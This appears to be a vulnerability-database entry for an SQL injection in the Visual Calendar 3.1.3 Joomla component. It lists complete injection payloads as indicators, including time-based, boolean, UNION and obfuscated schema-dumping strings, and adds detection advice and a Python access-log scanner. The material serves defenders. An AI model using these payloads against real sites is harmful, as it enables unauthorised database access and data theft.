CVE-2018-6395
published 2018-01-30

CVE-2018-6395: SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.

Priority: P262 | critical | 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.70% (84.1th percentile)

Affected

1 range

Vendor | Product | Version range | Fixed in
joomlacalendars | visual_calendar | |

Detection & IOCs (extracted from sources)

url: index.php?option=com_visualcalendar&view=load&id=[SQL]
command: id=1 AND SLEEP(5)
command: id=1 AND 2616=2616
command: id=1 UNION ALL SELECT CONCAT(0x716a627a71,0x586a6c7676787a6f684c73745863744b7955784a47534d58797158564a53716d6b57434f6141536c,0x71786b6a71),NULL,NULL,NULL,NULL,NULL-- QpYd
command: -1 /*!06666UNION*/ /*!06666SELECT*/ (SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x32,0x33,0x34,0x35,0x36-- -
  • Monitor HTTP GET requests to Joomla components for the parameter combination option=com_visualcalendar&view=load with a manipulated 'id' parameter containing SQL keywords (UNION, SELECT, SLEEP, AND) or encoded equivalents.
  • Detect time-based blind SQLi attempts by alerting on requests to com_visualcalendar containing SLEEP() in the id parameter.
  • Detect UNION-based SQLi attempts by alerting on requests to com_visualcalendar containing UNION ALL SELECT and NULL columns in the id parameter; the exploit uses a 6-column UNION query.
  • Detect obfuscated UNION SELECT using MySQL versioned comment syntax (/*!06666UNION*/ /*!06666SELECT*/) in requests targeting com_visualcalendar.
  • The SQL injection is exclusively via the HTTP GET 'id' parameter; flag any non-integer or SQL-containing value supplied to this parameter in com_visualcalendar requests.
  • The exploit specifically targets Visual Calendar version 3.1.3 for Joomla!; other versions may or may not be affected.
  • The SQL injection vulnerability is in the 'id' parameter only when the view=load action is used; other views/actions of the component are not confirmed vulnerable by this exploit.
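
One way to apply the detection notes above to web-server access logs, as an added example that is not part of the original page or any published rule. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')

# Checked in order. The versioned-comment rule comes first because
# r"\bunion\b" cannot match "06666UNION" (no word boundary after the digits).
RULES = [
    ("versioned-comment", re.compile(r"/\*!\d*\s*(?:union|select)", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("union", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean", re.compile(r"\b(?:and|or)\b", re.I)),
]

def classify_request(log_line):
    """Return None for benign lines, else a tag for the suspicious id value."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if (params.get("option", [""])[-1].lower() != "com_visualcalendar"
            or params.get("view", [""])[-1].lower() != "load"):
        return None
    for value in params.get("id", []):
        if re.fullmatch(r"\d+", value):
            continue  # plain integer id: expected input
        for tag, pattern in RULES:
            if pattern.search(value):
                return tag
        return "non-integer"
    return None

# Constructed sample log lines (not real traffic); 203.0.113.7 is a documentation address.
PREFIX = '203.0.113.7 - - [30/Jan/2018:10:00:00 +0000] "GET /index.php?option='
SUFFIX = ' HTTP/1.1" 200 512'
SAMPLE_LOG = [PREFIX + q + SUFFIX for q in (
    "com_visualcalendar&view=load&id=12",
    "com_visualcalendar&view=load&id=1%20AND%20SLEEP(5)",
    "com_visualcalendar&view=load&id=1+AND+2616%3D2616",
    "com_visualcalendar&view=load&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL--%20x",
    "com_visualcalendar&view=load&id=-1%20/*!06666UNION*/%20/*!06666SELECT*/%201",
    "com_content&view=article&id=1%20AND%20SLEEP(5)",
)]

def scan(lines):
    return [classify_request(line) for line in lines]  # one tag (or None) per line
```

Matching runs on the decoded parameter value, so percent-encoded and plus-encoded variants of the same payload produce the same tag; requests to other components or views are ignored.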

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P